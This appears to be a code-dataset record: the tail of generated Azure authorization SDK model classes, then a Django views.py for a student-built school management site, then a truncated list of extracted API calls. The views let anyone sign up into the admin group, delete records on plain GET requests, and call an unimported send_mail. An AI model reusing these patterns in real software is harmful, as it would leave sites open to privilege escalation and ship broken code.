list[~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorDetail] :ivar additional_info: The error additional info. :vartype additional_info: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorAdditionalInfo] """ _validation = { 'code': {'readonly': True}, 'message': {'readonly': True}, 'target': {'readonly': True}, 'details': {'readonly': True}, 'additional_info': {'readonly': True}, } _attribute_map = { 'code': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'target': {'key': 'target', 'type': 'str'}, 'details': {'key': 'details', 'type': '[ErrorDetail]'}, 'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'}, } def __init__( self, **kwargs ): super(ErrorDetail, self).__init__(**kwargs) self.code = None self.message = None self.target = None self.details = None self.additional_info = None class ErrorResponse(msrest.serialization.Model): """Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.). :param error: The error object. :type error: ~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorDetail """ _attribute_map = { 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, *, error: Optional["ErrorDetail"] = None, **kwargs ): super(ErrorResponse, self).__init__(**kwargs) self.error = error class Permission(msrest.serialization.Model): """Role definition permissions. :param actions: Allowed actions. :type actions: list[str] :param not_actions: Denied actions. :type not_actions: list[str] :param data_actions: Allowed Data actions. :type data_actions: list[str] :param not_data_actions: Denied Data actions. :type not_data_actions: list[str] """ _attribute_map = { 'actions': {'key': 'actions', 'type': '[str]'}, 'not_actions': {'key': 'notActions', 'type': '[str]'}, 'data_actions': {'key': 'dataActions', 'type': '[str]'}, 'not_data_actions': {'key': 'notDataActions', 'type': '[str]'}, } def __init__( self, *, actions: Optional[List[str]] = None, not_actions: Optional[List[str]] = None, data_actions: Optional[List[str]] = None, not_data_actions: Optional[List[str]] = None, **kwargs ): super(Permission, self).__init__(**kwargs) self.actions = actions self.not_actions = not_actions self.data_actions = data_actions self.not_data_actions = not_data_actions class PermissionGetResult(msrest.serialization.Model): """Permissions information. :param value: An array of permissions. :type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.Permission] :param next_link: The URL to use for getting the next set of results. :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[Permission]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } def __init__( self, *, value: Optional[List["Permission"]] = None, next_link: Optional[str] = None, **kwargs ): super(PermissionGetResult, self).__init__(**kwargs) self.value = value self.next_link = next_link class ProviderOperation(msrest.serialization.Model): """Operation. :param name: The operation name. :type name: str :param display_name: The operation display name. :type display_name: str :param description: The operation description. :type description: str :param origin: The operation origin. :type origin: str :param properties: The operation properties. :type properties: any :param is_data_action: The dataAction flag to specify the operation type. :type is_data_action: bool """ _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, 'origin': {'key': 'origin', 'type': 'str'}, 'properties': {'key': 'properties', 'type': 'object'}, 'is_data_action': {'key': 'isDataAction', 'type': 'bool'}, } def __init__( self, *, name: Optional[str] = None, display_name: Optional[str] = None, description: Optional[str] = None, origin: Optional[str] = None, properties: Optional[Any] = None, is_data_action: Optional[bool] = None, **kwargs ): super(ProviderOperation, self).__init__(**kwargs) self.name = name self.display_name = display_name self.description = description self.origin = origin self.properties = properties self.is_data_action = is_data_action class ProviderOperationsMetadata(msrest.serialization.Model): """Provider Operations metadata. :param id: The provider id. :type id: str :param name: The provider name. :type name: str :param type: The provider type. :type type: str :param display_name: The provider display name. :type display_name: str :param resource_types: The provider resource types. :type resource_types: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ResourceType] :param operations: The provider operations. :type operations: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperation] """ _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'resource_types': {'key': 'resourceTypes', 'type': '[ResourceType]'}, 'operations': {'key': 'operations', 'type': '[ProviderOperation]'}, } def __init__( self, *, id: Optional[str] = None, name: Optional[str] = None, type: Optional[str] = None, display_name: Optional[str] = None, resource_types: Optional[List["ResourceType"]] = None, operations: Optional[List["ProviderOperation"]] = None, **kwargs ): super(ProviderOperationsMetadata, self).__init__(**kwargs) self.id = id self.name = name self.type = type self.display_name = display_name self.resource_types = resource_types self.operations = operations class ProviderOperationsMetadataListResult(msrest.serialization.Model): """Provider operations metadata list. :param value: The list of providers. :type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperationsMetadata] :param next_link: The URL to use for getting the next set of results. :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[ProviderOperationsMetadata]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } def __init__( self, *, value: Optional[List["ProviderOperationsMetadata"]] = None, next_link: Optional[str] = None, **kwargs ): super(ProviderOperationsMetadataListResult, self).__init__(**kwargs) self.value = value self.next_link = next_link class ResourceType(msrest.serialization.Model): """Resource Type. :param name: The resource type name. :type name: str :param display_name: The resource type display name. :type display_name: str :param operations: The resource type operations. :type operations: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperation] """ _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'operations': {'key': 'operations', 'type': '[ProviderOperation]'}, } def __init__( self, *, name: Optional[str] = None, display_name: Optional[str] = None, operations: Optional[List["ProviderOperation"]] = None, **kwargs ): super(ResourceType, self).__init__(**kwargs) self.name = name self.display_name = display_name self.operations = operations class RoleAssignment(msrest.serialization.Model): """Role Assignments. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: The role assignment ID. :vartype id: str :ivar name: The role assignment name. :vartype name: str :ivar type: The role assignment type. :vartype type: str :param scope: The role assignment scope. :type scope: str :param role_definition_id: The role definition ID. :type role_definition_id: str :param principal_id: The principal ID. :type principal_id: str :param can_delegate: The Delegation flag for the role assignment. :type can_delegate: bool """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'scope': {'key': 'properties.scope', 'type': 'str'}, 'role_definition_id': {'key': 'properties.roleDefinitionId', 'type': 'str'}, 'principal_id': {'key': 'properties.principalId', 'type': 'str'}, 'can_delegate': {'key': 'properties.canDelegate', 'type': 'bool'}, } def __init__( self, *, scope: Optional[str] = None, role_definition_id: Optional[str] = None, principal_id: Optional[str] = None, can_delegate: Optional[bool] = None, **kwargs ): super(RoleAssignment, self).__init__(**kwargs) self.id = None self.name = None self.type = None self.scope = scope self.role_definition_id = role_definition_id self.principal_id = principal_id self.can_delegate = can_delegate class RoleAssignmentCreateParameters(msrest.serialization.Model): """Role assignment create parameters. All required parameters must be populated in order to send to Azure. :param role_definition_id: Required. The role definition ID used in the role assignment. :type role_definition_id: str :param principal_id: Required. The principal ID assigned to the role. This maps to the ID inside the Active Directory. It can point to a user, service principal, or security group. :type principal_id: str :param can_delegate: The delegation flag used for creating a role assignment. :type can_delegate: bool """ _validation = { 'role_definition_id': {'required': True}, 'principal_id': {'required': True}, } _attribute_map = { 'role_definition_id': {'key': 'properties.roleDefinitionId', 'type': 'str'}, 'principal_id': {'key': 'properties.principalId', 'type': 'str'}, 'can_delegate': {'key': 'properties.canDelegate', 'type': 'bool'}, } def __init__( self, *, role_definition_id: str, principal_id: str, can_delegate: Optional[bool] = None, **kwargs ): super(RoleAssignmentCreateParameters, self).__init__(**kwargs) self.role_definition_id = role_definition_id self.principal_id = principal_id self.can_delegate = can_delegate class RoleAssignmentFilter(msrest.serialization.Model): """Role Assignments filter. :param principal_id: Returns role assignment of the specific principal. :type principal_id: str :param can_delegate: The Delegation flag for the role assignment. :type can_delegate: bool """ _attribute_map = { 'principal_id': {'key': 'principalId', 'type': 'str'}, 'can_delegate': {'key': 'canDelegate', 'type': 'bool'}, } def __init__( self, *, principal_id: Optional[str] = None, can_delegate: Optional[bool] = None, **kwargs ): super(RoleAssignmentFilter, self).__init__(**kwargs) self.principal_id = principal_id self.can_delegate = can_delegate class RoleAssignmentListResult(msrest.serialization.Model): """Role assignment list operation result. :param value: Role assignment list. :type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.RoleAssignment] :param next_link: The URL to use for getting the next set of results. :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[RoleAssignment]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } def __init__( self, *, value: Optional[List["RoleAssignment"]] = None, next_link: Optional[str] = None, **kwargs ): super(RoleAssignmentListResult, self).__init__(**kwargs) self.value = value self.next_link = next_link class RoleDefinition(msrest.serialization.Model): """Role definition. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: The role definition ID. :vartype id: str :ivar name: The role definition name. :vartype name: str :ivar type: The role definition type. :vartype type: str :param role_name: The role name. :type role_name: str :param description: The role definition description. :type description: str :param role_type: The role type. :type role_type: str :param permissions: Role definition permissions. :type permissions: list[~azure.mgmt.authorization.v2018_01_01_preview.models.Permission] :param assignable_scopes: Role definition assignable scopes. :type assignable_scopes: list[str] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'role_name': {'key': 'properties.roleName', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'role_type': {'key': 'properties.type', 'type': 'str'}, 'permissions': {'key': 'properties.permissions', 'type': '[Permission]'}, 'assignable_scopes': {'key': 'properties.assignableScopes', 'type': '[str]'}, } def __init__( self, *, role_name: Optional[str] = None, description: Optional[str] = None, role_type: Optional[str] = None, permissions: Optional[List["Permission"]] = None, assignable_scopes: Optional[List[str]] = None, **kwargs ): super(RoleDefinition, self).__init__(**kwargs) self.id = None self.name = None self.type = None self.role_name = role_name self.description = description self.role_type = role_type self.permissions = permissions self.assignable_scopes = assignable_scopes class RoleDefinitionFilter(msrest.serialization.Model): """Role Definitions filter. :param role_name: Returns role definition with the specific name. :type role_name: str :param type: Returns role definition with the specific type. :type type: str """ _attribute_map = { 'role_name': {'key': 'roleName', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, } def __init__( self, *, role_name: Optional[str] = None, type: Optional[str] = None, **kwargs ): super(RoleDefinitionFilter, self).__init__(**kwargs) self.role_name = role_name self.type = type class RoleDefinitionListResult(msrest.serialization.Model): """Role definition list operation result. :param value: Role definition list. :type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.RoleDefinition] :param next_link: The URL to use for getting the next set of results. :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[RoleDefinition]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } def __init__( self, *, value: Optional[List["RoleDefinition"]] = None, next_link: Optional[str] = None, **kwargs ): super(RoleDefinitionListResult, self).__init__(**kwargs) self.value = value self.next_link = next_link
[]
pa-one-patel/college_managenment
school/views.py
be6f6dcac1f7e01f71d95f445e2118e8eec3fe3a
from django.shortcuts import render,redirect,reverse from . import forms,models from django.db.models import Sum from django.contrib.auth.models import Group from django.http import HttpResponseRedirect from django.contrib.auth.decorators import login_required,user_passes_test def home_view(request): if request.user.is_authenticated: return HttpResponseRedirect('afterlogin') return render(request,'school/index.html') #for showing signup/login button for teacher(by sumit) def adminclick_view(request): if request.user.is_authenticated: return HttpResponseRedirect('afterlogin') return render(request,'school/adminclick.html') #for showing signup/login button for teacher(by sumit) def teacherclick_view(request): if request.user.is_authenticated: return HttpResponseRedirect('afterlogin') return render(request,'school/teacherclick.html') #for showing signup/login button for student(by sumit) def studentclick_view(request): if request.user.is_authenticated: return HttpResponseRedirect('afterlogin') return render(request,'school/studentclick.html') def admin_signup_view(request): form=forms.AdminSigupForm() if request.method=='POST': form=forms.AdminSigupForm(request.POST) if form.is_valid(): user=form.save() user.set_password(user.password) user.save() my_admin_group = Group.objects.get_or_create(name='ADMIN') my_admin_group[0].user_set.add(user) return HttpResponseRedirect('adminlogin') return render(request,'school/adminsignup.html',{'form':form}) def student_signup_view(request): form1=forms.StudentUserForm() form2=forms.StudentExtraForm() mydict={'form1':form1,'form2':form2} if request.method=='POST': form1=forms.StudentUserForm(request.POST) form2=forms.StudentExtraForm(request.POST) if form1.is_valid() and form2.is_valid(): user=form1.save() user.set_password(user.password) user.save() f2=form2.save(commit=False) f2.user=user user2=f2.save() my_student_group = Group.objects.get_or_create(name='STUDENT') my_student_group[0].user_set.add(user) return HttpResponseRedirect('studentlogin') return render(request,'school/studentsignup.html',context=mydict) def teacher_signup_view(request): form1=forms.TeacherUserForm() form2=forms.TeacherExtraForm() mydict={'form1':form1,'form2':form2} if request.method=='POST': form1=forms.TeacherUserForm(request.POST) form2=forms.TeacherExtraForm(request.POST) if form1.is_valid() and form2.is_valid(): user=form1.save() user.set_password(user.password) user.save() f2=form2.save(commit=False) f2.user=user user2=f2.save() my_teacher_group = Group.objects.get_or_create(name='TEACHER') my_teacher_group[0].user_set.add(user) return HttpResponseRedirect('teacherlogin') return render(request,'school/teachersignup.html',context=mydict) #for checking user is techer , student or admin(by sumit) def is_admin(user): return user.groups.filter(name='ADMIN').exists() def is_teacher(user): return user.groups.filter(name='TEACHER').exists() def is_student(user): return user.groups.filter(name='STUDENT').exists() def afterlogin_view(request): if is_admin(request.user): return redirect('admin-dashboard') elif is_teacher(request.user): accountapproval=models.TeacherExtra.objects.all().filter(user_id=request.user.id,status=True) if accountapproval: return redirect('teacher-dashboard') else: return render(request,'school/teacher_wait_for_approval.html') elif is_student(request.user): accountapproval=models.StudentExtra.objects.all().filter(user_id=request.user.id,status=True) if accountapproval: return redirect('student-dashboard') else: return render(request,'school/student_wait_for_approval.html') #for dashboard of adminnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn(by sumit) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_dashboard_view(request): teachercount=models.TeacherExtra.objects.all().filter(status=True).count() pendingteachercount=models.TeacherExtra.objects.all().filter(status=False).count() studentcount=models.StudentExtra.objects.all().filter(status=True).count() pendingstudentcount=models.StudentExtra.objects.all().filter(status=False).count() teachersalary=models.TeacherExtra.objects.filter(status=True).aggregate(Sum('salary')) pendingteachersalary=models.TeacherExtra.objects.filter(status=False).aggregate(Sum('salary')) studentfee=models.StudentExtra.objects.filter(status=True).aggregate(Sum('fee',default=0)) pendingstudentfee=models.StudentExtra.objects.filter(status=False).aggregate(Sum('fee')) notice=models.Notice.objects.all() #aggregate function return dictionary so fetch data from dictionay(by sumit) mydict={ 'teachercount':teachercount, 'pendingteachercount':pendingteachercount, 'studentcount':studentcount, 'pendingstudentcount':pendingstudentcount, 'teachersalary':teachersalary['salary__sum'], 'pendingteachersalary':pendingteachersalary['salary__sum'], 'studentfee':studentfee['fee__sum'], 'pendingstudentfee':pendingstudentfee['fee__sum'], 'notice':notice } return render(request,'school/admin_dashboard.html',context=mydict) #for teacher sectionnnnnnnn by adminnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn(by sumit) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_teacher_view(request): return render(request,'school/admin_teacher.html') @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_add_teacher_view(request): form1=forms.TeacherUserForm() form2=forms.TeacherExtraForm() mydict={'form1':form1,'form2':form2} if request.method=='POST': form1=forms.TeacherUserForm(request.POST) form2=forms.TeacherExtraForm(request.POST) if form1.is_valid() and form2.is_valid(): user=form1.save() user.set_password(user.password) user.save() f2=form2.save(commit=False) f2.user=user f2.status=True f2.save() my_teacher_group = Group.objects.get_or_create(name='TEACHER') my_teacher_group[0].user_set.add(user) return HttpResponseRedirect('admin-teacher') return render(request,'school/admin_add_teacher.html',context=mydict) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_view_teacher_view(request): teachers=models.TeacherExtra.objects.all().filter(status=True) return render(request,'school/admin_view_teacher.html',{'teachers':teachers}) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_approve_teacher_view(request): teachers=models.TeacherExtra.objects.all().filter(status=False) return render(request,'school/admin_approve_teacher.html',{'teachers':teachers}) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def approve_teacher_view(request,pk): teacher=models.TeacherExtra.objects.get(id=pk) teacher.status=True teacher.save() return redirect(reverse('admin-approve-teacher')) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def delete_teacher_view(request,pk): teacher=models.TeacherExtra.objects.get(id=pk) user=models.User.objects.get(id=teacher.user_id) user.delete() teacher.delete() return redirect('admin-approve-teacher') @login_required(login_url='adminlogin') @user_passes_test(is_admin) def delete_teacher_from_school_view(request,pk): teacher=models.TeacherExtra.objects.get(id=pk) user=models.User.objects.get(id=teacher.user_id) user.delete() teacher.delete() return redirect('admin-view-teacher') @login_required(login_url='adminlogin') @user_passes_test(is_admin) def update_teacher_view(request,pk): teacher=models.TeacherExtra.objects.get(id=pk) user=models.User.objects.get(id=teacher.user_id) form1=forms.TeacherUserForm(instance=user) form2=forms.TeacherExtraForm(instance=teacher) mydict={'form1':form1,'form2':form2} if request.method=='POST': form1=forms.TeacherUserForm(request.POST,instance=user) form2=forms.TeacherExtraForm(request.POST,instance=teacher) print(form1) if form1.is_valid() and form2.is_valid(): user=form1.save() user.set_password(user.password) user.save() f2=form2.save(commit=False) f2.status=True f2.save() return redirect('admin-view-teacher') return render(request,'school/admin_update_teacher.html',context=mydict) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_view_teacher_salary_view(request): teachers=models.TeacherExtra.objects.all() return render(request,'school/admin_view_teacher_salary.html',{'teachers':teachers}) #for student by adminnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn(by sumit) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_student_view(request): return render(request,'school/admin_student.html') @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_add_student_view(request): form1=forms.StudentUserForm() form2=forms.StudentExtraForm() mydict={'form1':form1,'form2':form2} if request.method=='POST': form1=forms.StudentUserForm(request.POST) form2=forms.StudentExtraForm(request.POST) if form1.is_valid() and form2.is_valid(): print("form is valid") user=form1.save() user.set_password(user.password) user.save() f2=form2.save(commit=False) f2.user=user f2.status=True f2.save() my_student_group = Group.objects.get_or_create(name='STUDENT') my_student_group[0].user_set.add(user) else: print("form is invalid") return HttpResponseRedirect('admin-student') return render(request,'school/admin_add_student.html',context=mydict) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_view_student_view(request): students=models.StudentExtra.objects.all().filter(status=True) return render(request,'school/admin_view_student.html',{'students':students}) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def delete_student_from_school_view(request,pk): student=models.StudentExtra.objects.get(id=pk) user=models.User.objects.get(id=student.user_id) user.delete() student.delete() return redirect('admin-view-student') @login_required(login_url='adminlogin') @user_passes_test(is_admin) def delete_student_view(request,pk): student=models.StudentExtra.objects.get(id=pk) user=models.User.objects.get(id=student.user_id) user.delete() student.delete() return redirect('admin-approve-student') @login_required(login_url='adminlogin') @user_passes_test(is_admin) def update_student_view(request,pk): student=models.StudentExtra.objects.get(id=pk) user=models.User.objects.get(id=student.user_id) form1=forms.StudentUserForm(instance=user) form2=forms.StudentExtraForm(instance=student) mydict={'form1':form1,'form2':form2} if request.method=='POST': form1=forms.StudentUserForm(request.POST,instance=user) form2=forms.StudentExtraForm(request.POST,instance=student) print(form1) if form1.is_valid() and form2.is_valid(): user=form1.save() user.set_password(user.password) user.save() f2=form2.save(commit=False) f2.status=True f2.save() return redirect('admin-view-student') return render(request,'school/admin_update_student.html',context=mydict) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_approve_student_view(request): students=models.StudentExtra.objects.all().filter(status=False) return render(request,'school/admin_approve_student.html',{'students':students}) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def approve_student_view(request,pk): students=models.StudentExtra.objects.get(id=pk) students.status=True students.save() return redirect(reverse('admin-approve-student')) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_view_student_fee_view(request): students=models.StudentExtra.objects.all() return render(request,'school/admin_view_student_fee.html',{'students':students}) #attendance related viewwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww(by sumit) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_attendance_view(request): return render(request,'school/admin_attendance.html') @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_take_attendance_view(request,cl): students=models.StudentExtra.objects.all().filter(cl=cl) print(students) aform=forms.AttendanceForm() if request.method=='POST': form=forms.AttendanceForm(request.POST) if form.is_valid(): Attendances=request.POST.getlist('present_status') date=form.cleaned_data['date'] for i in range(len(Attendances)): AttendanceModel=models.Attendance() AttendanceModel.cl=cl AttendanceModel.date=date AttendanceModel.present_status=Attendances[i] AttendanceModel.roll=students[i].roll AttendanceModel.save() return redirect('admin-attendance') else: print('form invalid') return render(request,'school/admin_take_attendance.html',{'students':students,'aform':aform}) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_view_attendance_view(request,cl): form=forms.AskDateForm() if request.method=='POST': form=forms.AskDateForm(request.POST) if form.is_valid(): date=form.cleaned_data['date'] attendancedata=models.Attendance.objects.all().filter(date=date,cl=cl) studentdata=models.StudentExtra.objects.all().filter(cl=cl) mylist=zip(attendancedata,studentdata) return render(request,'school/admin_view_attendance_page.html',{'cl':cl,'mylist':mylist,'date':date}) else: print('form invalid') return render(request,'school/admin_view_attendance_ask_date.html',{'cl':cl,'form':form}) #fee related view by adminnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn(by sumit) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_fee_view(request): return render(request,'school/admin_fee.html') @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_view_fee_view(request,cl): feedetails=models.StudentExtra.objects.all().filter(cl=cl) return render(request,'school/admin_view_fee.html',{'feedetails':feedetails,'cl':cl}) #notice related viewsssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss(by sumit) @login_required(login_url='adminlogin') @user_passes_test(is_admin) def admin_notice_view(request): form=forms.NoticeForm() if request.method=='POST': form=forms.NoticeForm(request.POST) if form.is_valid(): form=form.save(commit=False) form.by=request.user.first_name form.save() return redirect('admin-dashboard') return render(request,'school/admin_notice.html',{'form':form}) #for TEACHER LOGIN SECTIONNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN(by sumit) @login_required(login_url='teacherlogin') @user_passes_test(is_teacher) def teacher_dashboard_view(request): teacherdata=models.TeacherExtra.objects.all().filter(status=True,user_id=request.user.id) notice=models.Notice.objects.all() mydict={ 'salary':teacherdata[0].salary, 'mobile':teacherdata[0].mobile, 'date':teacherdata[0].joindate, 'notice':notice } return render(request,'school/teacher_dashboard.html',context=mydict) @login_required(login_url='teacherlogin') @user_passes_test(is_teacher) def teacher_attendance_view(request): return render(request,'school/teacher_attendance.html') @login_required(login_url='teacherlogin') @user_passes_test(is_teacher) def teacher_take_attendance_view(request,cl): students=models.StudentExtra.objects.all().filter(cl=cl) aform=forms.AttendanceForm() if request.method=='POST': form=forms.AttendanceForm(request.POST) if form.is_valid(): Attendances=request.POST.getlist('present_status') date=form.cleaned_data['date'] for i in range(len(Attendances)): AttendanceModel=models.Attendance() AttendanceModel.cl=cl AttendanceModel.date=date AttendanceModel.present_status=Attendances[i] AttendanceModel.roll=students[i].roll AttendanceModel.save() return redirect('teacher-attendance') else: print('form invalid') return render(request,'school/teacher_take_attendance.html',{'students':students,'aform':aform}) @login_required(login_url='teacherlogin') @user_passes_test(is_teacher) def teacher_view_attendance_view(request,cl): form=forms.AskDateForm() if request.method=='POST': form=forms.AskDateForm(request.POST) if form.is_valid(): date=form.cleaned_data['date'] attendancedata=models.Attendance.objects.all().filter(date=date,cl=cl) studentdata=models.StudentExtra.objects.all().filter(cl=cl) mylist=zip(attendancedata,studentdata) return render(request,'school/teacher_view_attendance_page.html',{'cl':cl,'mylist':mylist,'date':date}) else: print('form invalid') return render(request,'school/teacher_view_attendance_ask_date.html',{'cl':cl,'form':form}) @login_required(login_url='teacherlogin') @user_passes_test(is_teacher) def teacher_notice_view(request): form=forms.NoticeForm() if request.method=='POST': form=forms.NoticeForm(request.POST) if form.is_valid(): form=form.save(commit=False) form.by=request.user.first_name form.save() return redirect('teacher-dashboard') else: print('form invalid') return render(request,'school/teacher_notice.html',{'form':form}) #FOR STUDENT AFTER THEIR Loginnnnnnnnnnnnnnnnnnnnn(by sumit) @login_required(login_url='studentlogin') @user_passes_test(is_student) def student_dashboard_view(request): studentdata=models.StudentExtra.objects.all().filter(status=True,user_id=request.user.id) notice=models.Notice.objects.all() mydict={ 'roll':studentdata[0].roll, 'mobile':studentdata[0].mobile, 'fee':studentdata[0].fee, 'notice':notice } return render(request,'school/student_dashboard.html',context=mydict) @login_required(login_url='studentlogin') @user_passes_test(is_student) def student_attendance_view(request): form=forms.AskDateForm() if request.method=='POST': form=forms.AskDateForm(request.POST) if form.is_valid(): date=form.cleaned_data['date'] studentdata=models.StudentExtra.objects.all().filter(user_id=request.user.id,status=True) attendancedata=models.Attendance.objects.all().filter(date=date,cl=studentdata[0].cl,roll=studentdata[0].roll) mylist=zip(attendancedata,studentdata) return render(request,'school/student_view_attendance_page.html',{'mylist':mylist,'date':date}) else: print('form invalid') return render(request,'school/student_view_attendance_ask_date.html',{'form':form}) # for aboutus and contact ussssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss (by sumit) def aboutus_view(request): return render(request,'school/aboutus.html') def contactus_view(request): sub = forms.ContactusForm() if request.method == 'POST': sub = forms.ContactusForm(request.POST) if sub.is_valid(): email = sub.cleaned_data['Email'] name=sub.cleaned_data['Name'] message = sub.cleaned_data['Message'] send_mail(str(name)+' || '+str(email),message, EMAIL_HOST_USER, ['[email protected]'], fail_silently = False) return render(request, 'school/contactussuccess.html') return render(request, 'school/contactus.html', {'form':sub})
[((136, 1, 136, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((137, 1, 137, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(137, 18, 137, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((181, 1, 181, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((182, 1, 182, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(182, 18, 182, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((186, 1, 186, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((187, 1, 187, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(187, 18, 187, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((212, 1, 212, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((213, 1, 213, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(213, 18, 213, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((219, 1, 219, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((220, 1, 220, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(220, 18, 220, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((226, 1, 226, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((227, 1, 227, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(227, 18, 227, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((235, 1, 235, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((236, 1, 236, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(236, 18, 236, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((245, 1, 245, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((246, 1, 246, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(246, 18, 246, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((255, 1, 255, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((256, 1, 256, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(256, 18, 256, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, 